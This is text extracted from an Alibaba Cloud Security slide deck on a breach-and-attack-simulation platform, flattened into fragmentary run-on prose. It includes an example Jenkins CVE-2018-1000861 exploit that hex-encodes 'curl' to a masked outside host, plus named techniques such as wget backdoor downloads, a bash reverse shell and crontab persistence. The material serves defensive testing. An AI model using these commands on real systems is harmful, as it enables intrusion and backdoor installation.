阿里云安全：入侵攻击模拟演练平台建设实践（31页）.pdf

《阿里云安全：入侵攻击模拟演练平台建设实践（31页）.pdf》由会员分享，可在线阅读，更多相关《阿里云安全：入侵攻击模拟演练平台建设实践（31页）.pdf（31页珍藏版）》请在三个皮匠报告上搜索。

1、什么是入侵攻击模拟要解决的问题存在的挑战入侵攻击模拟演练机制简介突破入口模拟防御水位衡量模拟演练机制简介检测/响应水位衡量其他业务场景落地企业采用多种安全措施，每一种都可能因配置错误/运营问题失效，且难以察觉如仅依靠蓝军或外采渗透测试，案例数量较少、时间上不连续、可能遗漏、成本高安全水位无法量化，建设效果难以衡量从攻击者视角对企业基础设施进行持续的自动化安全测试针对安全措施失效、蓝军成本高的问题定义模型量化当前安全水位，发现问题，反哺防御检测能力-解决无法量化的问题2017年，Gartner将入侵攻击模拟技术(BAS)列为威胁对抗Hype Cycle中的新类别如何对入侵攻击场景进行威胁建模并分

2、级如何持续、尽量真实地测试并避免稳定性问题防御、检测水位如何量化评估什么是入侵攻击模拟要解决的问题存在的挑战入侵攻击模拟演练机制简介突破入口模拟防御水位衡量模拟演练机制简介检测/响应水位衡量其他业务场景落地杀伤链模型攻击行为模拟-衡量检测响应水位突破入口模拟-衡量防御水位寻找突破入口实施恶意行为阻止攻击检测响应修复“利用成功”前后攻防重点不同攻击方防守方模拟演练方脚本小子专业蓝军国家顶尖技术水平一般，主要利用现成工具；资源少技术水平较高，自行编写工具；资源较多技术水平高，可能使用0day；资源丰富什么是入侵攻击模拟要解决的问题存在的挑战入侵攻击模拟演练机制简介突破入口模拟防御水位衡量模拟演练机

3、制简介检测/响应水位衡量其他业务场景落地录入测试插件原子能力测试随机拨测回归测试枚举入侵威胁防御措施?拦截未拦防御措施防御措施变更攻击1攻击2攻击3攻击1攻击2攻击3优化防御策略目标入口攻击向量绕过手法恶意行为Web通用组件-Jenkins(脚本语言为Groovy)远程命令执行漏洞CVE-2018-1000861编码-十六进制编码(Groovy原生支持hex和base64)连接恶意网站-curl 120.26.xx.xx:23333“curl 120.26.xx.xx:23333”的十六进制编码目标入口Target of Attack/Vulnerable Point攻击向量Attack Ve

4、ctor/Vulnerability绕过手法Bypass/Escape/Encoding恶意行为Shellcode/Command/Malicious OutcomeWeb服务及组件其他服务自研服务/组件通用服务/组件注入服务端请求伪造(SSRF)不安全的反序列化访问控制存在问题XXX编码语法语义架构/性能数据渗出后门植入/持久化权限提升凭证窃取自研服务/组件通用服务/组件什么是入侵攻击模拟要解决的问题存在的挑战入侵攻击模拟演练机制简介突破入口模拟防御水位衡量模拟演练机制简介检测/响应水位衡量其他业务场景落地目标入口攻击向量攻击类型绕过手法恶意行为POC测试时间拦截情况目标1向量1类型1绕过1

5、行为1时间1目标2向量2类型2绕过2行为2时间2目标3向量3类型3绕过3行为3时间3测试结果汇总攻击类型拦截数/攻击数未拦截详情命令执行/SQL注入/总计/原子能力衡量目标入口拦截数/攻击数分析目标10/100未接入防御措施目标236/100防御措施不足随机拨测回归测试测试样例测试时间(变更前)拦截测试时间(变更后)拦截分析攻击1正常攻击2变更导致防御失效总计10088需回滚什么是入侵攻击模拟要解决的问题存在的挑战入侵攻击模拟演练机制简介突破入口模拟防御水位衡量模拟演练机制简介检测/响应水位衡量其他业务场景落地演练剧本编排攻击指令执行反入侵团队介入演练报告生成l 随机化剧本生成 机器数 应用范

6、围 攻击阶段。攻击路径生成后门植入命令与控制持久化数据窃取。攻击手法分配输入参数后门植入命令与控制持久化数据窃取。HOW？1.wget http:/ backdoor3./backdoor4.攻击手法序列攻击命令序列l 攻击手法组件化（已集成300+手法）突破入口后门植入命令与控制权限提升持久化。Fastjson反序列化wget下载Bash反弹shelldirty cowcrontab定时任务CVE-2018-1000861curl下载http后门sudoLinux创建用户。